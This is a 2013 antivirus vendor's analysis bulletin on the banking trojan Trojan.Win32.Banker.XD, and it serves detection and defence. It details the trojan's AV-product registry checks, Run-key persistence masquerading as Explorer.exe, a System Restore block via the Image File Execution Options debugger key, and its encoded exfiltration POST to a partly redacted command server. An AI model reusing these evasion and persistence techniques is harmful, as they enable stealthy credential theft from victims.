27/09/2013
12:46

Trojan.Win32.Banker.XD uses stealth techniques  to evade its presence


The C.R.A.M. (Anti-Malware Research Center) has detected from few weeks a new banker spreading activity using stealth techniques to hide its presence

From few weeks a new banker variant using stealth techniques in order to hide its presence is spreading through the network.
This new banker variant, classificated as Trojan.Win32.Banker.XD, hides its presence at registry level in order to be run immediately at Windows Startup and disables the restore system configuration.

The sample analyzed by the C.R.A.M. (Anti-Malware Research Center) team has been identified with the name of Trojan.Win32.banker.XD,


File property:
MD5: DFFAFE13BE9FEA16EB79E4EF1A3E0E13
Size: 96608 byte
Name: [random name].exe
Language: Cinese (Hong Kong - R.A.S.)
Original file name: Bloemfon.exe
Product: Forepoint seroderm
Society: CamStudio Open Source Dev Team

When the file infected with Trojan.Win32.Banker.XD is executed, it creates a hidden folder with system attributes:
C:\Programmi\Common Files\h65guhb0

Two files are created inside the directory:

  • dttezfca.exe (a copy of the infection with read only and hidden attributes) 

  • 00177fae.txt (it is removed immediately after its creation, no data are written inside the file)

Actions performed on the Windows register:

Creates the key
HKCU\Software\WinZip\Uuid
 

Reads the value of the key

HKLM\SOFTWARE\Microsoft NT\CurrentVersion\ProductId

Checks the presence of possible AntiVirus on computer, querying in sequence the following keys:

  • HKLM\SOFTWARE\Symantec

  • HKLM\SOFTWARE\Avira

  • HKLM\SOFTWARE\ESET

  • HKLM\SOFTWARE\ArcaBit

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG_UI

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bdagent

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trendo Micro Titanium

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avast

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSC

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BullGuard

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sophos AutoUpdate Monitor

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SplDerAgent

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\APVXDWIN

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\emisisoft anti-malware

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ISTray

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G Data AntiVirus Tray Application

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G Data AntiVirus Tray

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZoneAlarm

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bkav

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\V3 Application

Reads the value of:

  • HKCU\Software \Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup


To be executed at Windows Startup the Trojan.Win32.Banker.XDadds the following registry keys:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    [j8hjfuin] =
    \Windows\Explorer.exe

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    [j8hjfuin] =
    \Windows\Explorer.exe


The string j8hjfuin pointing to \Windows\Explorer.exe doesn’t fire up the traditional Windows Explorer.exe instead it starts the Trojan.Win32.Banker.XD loading it from the position C:\Programmi\Common Files\h65guhb0\dttezftca.exe

When a read request (at user mode) of the Trojan.Win32.banker.XD registry key is made, the returned value is the path of the following file "\Windows\Explorer.exe" instead of the Trojan.Win32.Banker.XD. original path.


The infection also goes to disable the Windows System Restore utility, blocking the execution of the original Windows file rstrui.exe.
To achieve this, the Trojan.Win32.Banker.XD adds the following registry key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\IamgeFileExecutionOptions\rstrui.exe
[Debugger] = <random name>_.exe


With this alteration, all started programs, with name rstrui.exe , are executed with the debugger set in the above registry key.
If the set debugger is not present in the system, this will generate an error execution of the required program.

In this case, the Trojan.Win32.Banker.XD, sets as default debugger a .EXE file with random name, changed at every computer restart, here some example:

  • txklyboa_.exe

  • lgzo_.exe

  • t_.exe

  • [nome casuale]_.exe

The specified debugger file it is not stored on the infected system.

With this technique the user will never use the Windows System Restore utility.

With this latest change the banker ensures a constant presence on the compromised computer blocking the possibility to restore the operating system to a prior point of infection.

The Trojan.Win32.Banker.XD makes connections to the http://www.romeoxx.xx (217.23.xxx.xxx) website on port 80, sending the following request:

POST /batman/ice/order.php HTTP/1.1 uploading five different values:
 

ps0=

0000000000000000000000000000000000000
0000000000000000000000000000000000000

ps1=

855BB5FD28AB63A326466800ED74AC5FF9325F43F
1603E957DDE6640906CE811A735A243F4298FB91C
318F08FE4BB334C9812265B2340B2523B8C4D8025
D83892682B9FB18DB30D13FE27056E28168B9C275
316FCDEC85C7AF67B7F3A11AA6A5E0C82B0789F86
4E54B89795E49766EC12507B950DB45F59BEE71E7
72DE464BB1899CEC44DA1614CD5D0BBC0098D32
15AB2E449F2

cs1=

5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4E
A70CCD0EA41CCFAEA72CCD4EA70CCD6EA73CC99
EA5BCCD0EA71CCDCEA6ECCE5EA75CC8FEA28CCD
EEA68CCD1EA7FCC89EA41CCCFEA7BCCCEEA75CC
D1EA64CCDDEA71CCCBEA33CCDCEA65CCDCEA

cs2=

74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCD
CEA65CCDCEA

cs3=

5ECCEBEA5CCCF4EA45CCE9EA2ACC8CEA2BCC8F
EA28CC8AEA41CCFAEA4FCCF8EA50CC


Geolocation of the http://www.romeoxx.xx (217.23.xxx.xxx) website.

 

The Trojan.Win32.Banker.XD is detected and removed from   Vir.IT eXplorer version 7.5.1.


---------------------------------
C.R.A.M. (Anti-Malware Research Center) team of TGSoft

Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: